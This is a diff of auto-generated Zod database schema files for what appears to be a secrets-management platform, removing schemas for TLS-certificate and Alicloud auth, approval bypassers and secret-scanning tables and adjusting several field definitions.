||||
accessTokenTrustedIps: z.unknown(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
identityId: z.string().uuid(),
|
||||
type: z.string(),
|
||||
allowedArns: z.string()
|
||||
});
|
||||
|
||||
export type TIdentityAlicloudAuths = z.infer<typeof IdentityAlicloudAuthsSchema>;
|
||||
export type TIdentityAlicloudAuthsInsert = Omit<z.input<typeof IdentityAlicloudAuthsSchema>, TImmutableDBKeys>;
|
||||
export type TIdentityAlicloudAuthsUpdate = Partial<Omit<z.input<typeof IdentityAlicloudAuthsSchema>, TImmutableDBKeys>>;
|
@ -18,7 +18,7 @@ export const IdentityKubernetesAuthsSchema = z.object({
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
identityId: z.string().uuid(),
|
||||
kubernetesHost: z.string().nullable().optional(),
|
||||
kubernetesHost: z.string(),
|
||||
encryptedCaCert: z.string().nullable().optional(),
|
||||
caCertIV: z.string().nullable().optional(),
|
||||
caCertTag: z.string().nullable().optional(),
|
||||
@ -31,8 +31,7 @@ export const IdentityKubernetesAuthsSchema = z.object({
|
||||
encryptedKubernetesTokenReviewerJwt: zodBuffer.nullable().optional(),
|
||||
encryptedKubernetesCaCertificate: zodBuffer.nullable().optional(),
|
||||
gatewayId: z.string().uuid().nullable().optional(),
|
||||
accessTokenPeriod: z.coerce.number().default(0),
|
||||
tokenReviewMode: z.string().default("api")
|
||||
accessTokenPeriod: z.coerce.number().default(0)
|
||||
});
|
||||
|
||||
export type TIdentityKubernetesAuths = z.infer<typeof IdentityKubernetesAuthsSchema>;
|
||||
|
@ -1,27 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { zodBuffer } from "@app/lib/zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const IdentityTlsCertAuthsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
accessTokenTTL: z.coerce.number().default(7200),
|
||||
accessTokenMaxTTL: z.coerce.number().default(7200),
|
||||
accessTokenNumUsesLimit: z.coerce.number().default(0),
|
||||
accessTokenTrustedIps: z.unknown(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
identityId: z.string().uuid(),
|
||||
allowedCommonNames: z.string().nullable().optional(),
|
||||
encryptedCaCertificate: zodBuffer
|
||||
});
|
||||
|
||||
export type TIdentityTlsCertAuths = z.infer<typeof IdentityTlsCertAuthsSchema>;
|
||||
export type TIdentityTlsCertAuthsInsert = Omit<z.input<typeof IdentityTlsCertAuthsSchema>, TImmutableDBKeys>;
|
||||
export type TIdentityTlsCertAuthsUpdate = Partial<Omit<z.input<typeof IdentityTlsCertAuthsSchema>, TImmutableDBKeys>>;
|
@ -1,6 +1,5 @@
|
||||
export * from "./access-approval-policies";
|
||||
export * from "./access-approval-policies-approvers";
|
||||
export * from "./access-approval-policies-bypassers";
|
||||
export * from "./access-approval-requests";
|
||||
export * from "./access-approval-requests-reviewers";
|
||||
export * from "./api-keys";
|
||||
@ -24,12 +23,6 @@ export * from "./dynamic-secrets";
|
||||
export * from "./external-certificate-authorities";
|
||||
export * from "./external-group-org-role-mappings";
|
||||
export * from "./external-kms";
|
||||
export * from "./folder-checkpoint-resources";
|
||||
export * from "./folder-checkpoints";
|
||||
export * from "./folder-commit-changes";
|
||||
export * from "./folder-commits";
|
||||
export * from "./folder-tree-checkpoint-resources";
|
||||
export * from "./folder-tree-checkpoints";
|
||||
export * from "./gateways";
|
||||
export * from "./git-app-install-sessions";
|
||||
export * from "./git-app-org";
|
||||
@ -39,7 +32,6 @@ export * from "./group-project-memberships";
|
||||
export * from "./groups";
|
||||
export * from "./identities";
|
||||
export * from "./identity-access-tokens";
|
||||
export * from "./identity-alicloud-auths";
|
||||
export * from "./identity-aws-auths";
|
||||
export * from "./identity-azure-auths";
|
||||
export * from "./identity-gcp-auths";
|
||||
@ -52,7 +44,6 @@ export * from "./identity-org-memberships";
|
||||
export * from "./identity-project-additional-privilege";
|
||||
export * from "./identity-project-membership-role";
|
||||
export * from "./identity-project-memberships";
|
||||
export * from "./identity-tls-cert-auths";
|
||||
export * from "./identity-token-auths";
|
||||
export * from "./identity-ua-client-secrets";
|
||||
export * from "./identity-universal-auths";
|
||||
@ -101,7 +92,6 @@ export * from "./saml-configs";
|
||||
export * from "./scim-tokens";
|
||||
export * from "./secret-approval-policies";
|
||||
export * from "./secret-approval-policies-approvers";
|
||||
export * from "./secret-approval-policies-bypassers";
|
||||
export * from "./secret-approval-request-secret-tags";
|
||||
export * from "./secret-approval-request-secret-tags-v2";
|
||||
export * from "./secret-approval-requests";
|
||||
@ -119,12 +109,7 @@ export * from "./secret-rotation-outputs";
|
||||
export * from "./secret-rotation-v2-secret-mappings";
|
||||
export * from "./secret-rotations";
|
||||
export * from "./secret-rotations-v2";
|
||||
export * from "./secret-scanning-configs";
|
||||
export * from "./secret-scanning-data-sources";
|
||||
export * from "./secret-scanning-findings";
|
||||
export * from "./secret-scanning-git-risks";
|
||||
export * from "./secret-scanning-resources";
|
||||
export * from "./secret-scanning-scans";
|
||||
export * from "./secret-sharing";
|
||||
export * from "./secret-snapshot-folders";
|
||||
export * from "./secret-snapshot-secrets";
|
||||
|
@ -80,13 +80,11 @@ export enum TableName {
|
||||
IdentityGcpAuth = "identity_gcp_auths",
|
||||
IdentityAzureAuth = "identity_azure_auths",
|
||||
IdentityUaClientSecret = "identity_ua_client_secrets",
|
||||
IdentityAliCloudAuth = "identity_alicloud_auths",
|
||||
IdentityAwsAuth = "identity_aws_auths",
|
||||
IdentityOciAuth = "identity_oci_auths",
|
||||
IdentityOidcAuth = "identity_oidc_auths",
|
||||
IdentityJwtAuth = "identity_jwt_auths",
|
||||
IdentityLdapAuth = "identity_ldap_auths",
|
||||
IdentityTlsCertAuth = "identity_tls_cert_auths",
|
||||
IdentityOrgMembership = "identity_org_memberships",
|
||||
IdentityProjectMembership = "identity_project_memberships",
|
||||
IdentityProjectMembershipRole = "identity_project_membership_role",
|
||||
@ -97,12 +95,10 @@ export enum TableName {
|
||||
ScimToken = "scim_tokens",
|
||||
AccessApprovalPolicy = "access_approval_policies",
|
||||
AccessApprovalPolicyApprover = "access_approval_policies_approvers",
|
||||
AccessApprovalPolicyBypasser = "access_approval_policies_bypassers",
|
||||
AccessApprovalRequest = "access_approval_requests",
|
||||
AccessApprovalRequestReviewer = "access_approval_requests_reviewers",
|
||||
SecretApprovalPolicy = "secret_approval_policies",
|
||||
SecretApprovalPolicyApprover = "secret_approval_policies_approvers",
|
||||
SecretApprovalPolicyBypasser = "secret_approval_policies_bypassers",
|
||||
SecretApprovalRequest = "secret_approval_requests",
|
||||
SecretApprovalRequestReviewer = "secret_approval_requests_reviewers",
|
||||
SecretApprovalRequestSecret = "secret_approval_requests_secrets",
|
||||
@ -161,21 +157,10 @@ export enum TableName {
|
||||
MicrosoftTeamsIntegrations = "microsoft_teams_integrations",
|
||||
ProjectMicrosoftTeamsConfigs = "project_microsoft_teams_configs",
|
||||
SecretReminderRecipients = "secret_reminder_recipients",
|
||||
GithubOrgSyncConfig = "github_org_sync_configs",
|
||||
FolderCommit = "folder_commits",
|
||||
FolderCommitChanges = "folder_commit_changes",
|
||||
FolderCheckpoint = "folder_checkpoints",
|
||||
FolderCheckpointResources = "folder_checkpoint_resources",
|
||||
FolderTreeCheckpoint = "folder_tree_checkpoints",
|
||||
FolderTreeCheckpointResources = "folder_tree_checkpoint_resources",
|
||||
SecretScanningDataSource = "secret_scanning_data_sources",
|
||||
SecretScanningResource = "secret_scanning_resources",
|
||||
SecretScanningScan = "secret_scanning_scans",
|
||||
SecretScanningFinding = "secret_scanning_findings",
|
||||
SecretScanningConfig = "secret_scanning_configs"
|
||||
GithubOrgSyncConfig = "github_org_sync_configs"
|
||||
}
|
||||
|
||||
export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt" | "commitId";
|
||||
export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt";
|
||||
|
||||
export const UserDeviceSchema = z
|
||||
.object({
|
||||
@ -249,10 +234,8 @@ export enum IdentityAuthMethod {
|
||||
UNIVERSAL_AUTH = "universal-auth",
|
||||
KUBERNETES_AUTH = "kubernetes-auth",
|
||||
GCP_AUTH = "gcp-auth",
|
||||
ALICLOUD_AUTH = "alicloud-auth",
|
||||
AWS_AUTH = "aws-auth",
|
||||
AZURE_AUTH = "azure-auth",
|
||||
TLS_CERT_AUTH = "tls-cert-auth",
|
||||
OCI_AUTH = "oci-auth",
|
||||
OIDC_AUTH = "oidc-auth",
|
||||
JWT_AUTH = "jwt-auth",
|
||||
@ -263,8 +246,16 @@ export enum ProjectType {
|
||||
SecretManager = "secret-manager",
|
||||
CertificateManager = "cert-manager",
|
||||
KMS = "kms",
|
||||
SSH = "ssh",
|
||||
SecretScanning = "secret-scanning"
|
||||
SSH = "ssh"
|
||||
}
|
||||
|
||||
export enum ActionProjectType {
|
||||
SecretManager = ProjectType.SecretManager,
|
||||
CertificateManager = ProjectType.CertificateManager,
|
||||
KMS = ProjectType.KMS,
|
||||
SSH = ProjectType.SSH,
|
||||
// project operations that happen on all types
|
||||
Any = "any"
|
||||
}
|
||||
|
||||
export enum SortDirection {
|
||||
|
@ -18,8 +18,7 @@ export const OrgMembershipsSchema = z.object({
|
||||
orgId: z.string().uuid(),
|
||||
roleId: z.string().uuid().nullable().optional(),
|
||||
projectFavorites: z.string().array().nullable().optional(),
|
||||
isActive: z.boolean().default(true),
|
||||
lastInvitedAt: z.date().nullable().optional()
|
||||
isActive: z.boolean().default(true)
|
||||
});
|
||||
|
||||
export type TOrgMemberships = z.infer<typeof OrgMembershipsSchema>;
|
||||
|
@ -16,7 +16,7 @@ export const ProjectTemplatesSchema = z.object({
|
||||
orgId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
type: z.string().nullable().optional()
|
||||
type: z.string().default("secret-manager")
|
||||
});
|
||||
|
||||
export type TProjectTemplates = z.infer<typeof ProjectTemplatesSchema>;
|
||||
|
@ -25,12 +25,10 @@ export const ProjectsSchema = z.object({
|
||||
kmsSecretManagerKeyId: z.string().uuid().nullable().optional(),
|
||||
kmsSecretManagerEncryptedDataKey: zodBuffer.nullable().optional(),
|
||||
description: z.string().nullable().optional(),
|
||||
type: z.string().nullable().optional(),
|
||||
type: z.string(),
|
||||
enforceCapitalization: z.boolean().default(false),
|
||||
hasDeleteProtection: z.boolean().default(false).nullable().optional(),
|
||||
secretSharing: z.boolean().default(true),
|
||||
showSnapshotsLegacy: z.boolean().default(false),
|
||||
defaultProduct: z.string().default("secret-manager")
|
||||
secretSharing: z.boolean().default(true)
|
||||
});
|
||||
|
||||
export type TProjects = z.infer<typeof ProjectsSchema>;
|
||||
|
@ -1,26 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const SecretApprovalPoliciesBypassersSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
bypasserGroupId: z.string().uuid().nullable().optional(),
|
||||
bypasserUserId: z.string().uuid().nullable().optional(),
|
||||
policyId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TSecretApprovalPoliciesBypassers = z.infer<typeof SecretApprovalPoliciesBypassersSchema>;
|
||||
export type TSecretApprovalPoliciesBypassersInsert = Omit<
|
||||
z.input<typeof SecretApprovalPoliciesBypassersSchema>,
|
||||
TImmutableDBKeys
|
||||
>;
|
||||
export type TSecretApprovalPoliciesBypassersUpdate = Partial<
|
||||
Omit<z.input<typeof SecretApprovalPoliciesBypassersSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -10,7 +10,7 @@ import { TImmutableDBKeys } from "./models";
|
||||
export const SecretApprovalPoliciesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
name: z.string(),
|
||||
secretPath: z.string(),
|
||||
secretPath: z.string().nullable().optional(),
|
||||
approvals: z.number().default(1),
|
||||
envId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
|
@ -18,7 +18,7 @@ export const SecretApprovalRequestsSchema = z.object({
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
isReplicated: z.boolean().nullable().optional(),
|
||||
committerUserId: z.string().uuid().nullable().optional(),
|
||||
committerUserId: z.string().uuid(),
|
||||
statusChangedByUserId: z.string().uuid().nullable().optional(),
|
||||
bypassReason: z.string().nullable().optional()
|
||||
});
|
||||
|
@ -14,8 +14,7 @@ export const SecretFolderVersionsSchema = z.object({
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
envId: z.string().uuid(),
|
||||
folderId: z.string().uuid(),
|
||||
description: z.string().nullable().optional()
|
||||
folderId: z.string().uuid()
|
||||
});
|
||||
|
||||
export type TSecretFolderVersions = z.infer<typeof SecretFolderVersionsSchema>;
|
||||
|
@ -1,20 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const SecretScanningConfigsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
projectId: z.string(),
|
||||
content: z.string().nullable().optional(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TSecretScanningConfigs = z.infer<typeof SecretScanningConfigsSchema>;
|
||||
export type TSecretScanningConfigsInsert = Omit<z.input<typeof SecretScanningConfigsSchema>, TImmutableDBKeys>;
|
||||
export type TSecretScanningConfigsUpdate = Partial<Omit<z.input<typeof SecretScanningConfigsSchema>, TImmutableDBKeys>>;
|
@ -1,32 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { zodBuffer } from "@app/lib/zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const SecretScanningDataSourcesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
externalId: z.string().nullable().optional(),
|
||||
name: z.string(),
|
||||
description: z.string().nullable().optional(),
|
||||
type: z.string(),
|
||||
config: z.unknown(),
|
||||
encryptedCredentials: zodBuffer.nullable().optional(),
|
||||
connectionId: z.string().uuid().nullable().optional(),
|
||||
isAutoScanEnabled: z.boolean().default(true).nullable().optional(),
|
||||
projectId: z.string(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date(),
|
||||
isDisconnected: z.boolean().default(false)
|
||||
});
|
||||
|
||||
export type TSecretScanningDataSources = z.infer<typeof SecretScanningDataSourcesSchema>;
|
||||
export type TSecretScanningDataSourcesInsert = Omit<z.input<typeof SecretScanningDataSourcesSchema>, TImmutableDBKeys>;
|
||||
export type TSecretScanningDataSourcesUpdate = Partial<
|
||||
Omit<z.input<typeof SecretScanningDataSourcesSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -1,32 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const SecretScanningFindingsSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
dataSourceName: z.string(),
|
||||
dataSourceType: z.string(),
|
||||
resourceName: z.string(),
|
||||
resourceType: z.string(),
|
||||
rule: z.string(),
|
||||
severity: z.string(),
|
||||
status: z.string().default("unresolved"),
|
||||
remarks: z.string().nullable().optional(),
|
||||
fingerprint: z.string(),
|
||||
details: z.unknown(),
|
||||
projectId: z.string(),
|
||||
scanId: z.string().uuid().nullable().optional(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TSecretScanningFindings = z.infer<typeof SecretScanningFindingsSchema>;
|
||||
export type TSecretScanningFindingsInsert = Omit<z.input<typeof SecretScanningFindingsSchema>, TImmutableDBKeys>;
|
||||
export type TSecretScanningFindingsUpdate = Partial<
|
||||
Omit<z.input<typeof SecretScanningFindingsSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -1,24 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const SecretScanningResourcesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
externalId: z.string(),
|
||||
name: z.string(),
|
||||
type: z.string(),
|
||||
dataSourceId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TSecretScanningResources = z.infer<typeof SecretScanningResourcesSchema>;
|
||||
export type TSecretScanningResourcesInsert = Omit<z.input<typeof SecretScanningResourcesSchema>, TImmutableDBKeys>;
|
||||
export type TSecretScanningResourcesUpdate = Partial<
|
||||
Omit<z.input<typeof SecretScanningResourcesSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -1,21 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const SecretScanningScansSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
status: z.string().default("queued"),
|
||||
statusMessage: z.string().nullable().optional(),
|
||||
type: z.string(),
|
||||
resourceId: z.string().uuid(),
|
||||
createdAt: z.date().nullable().optional()
|
||||
});
|
||||
|
||||
export type TSecretScanningScans = z.infer<typeof SecretScanningScansSchema>;
|
||||
export type TSecretScanningScansInsert = Omit<z.input<typeof SecretScanningScansSchema>, TImmutableDBKeys>;
|
||||
export type TSecretScanningScansUpdate = Partial<Omit<z.input<typeof SecretScanningScansSchema>, TImmutableDBKeys>>;
|
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user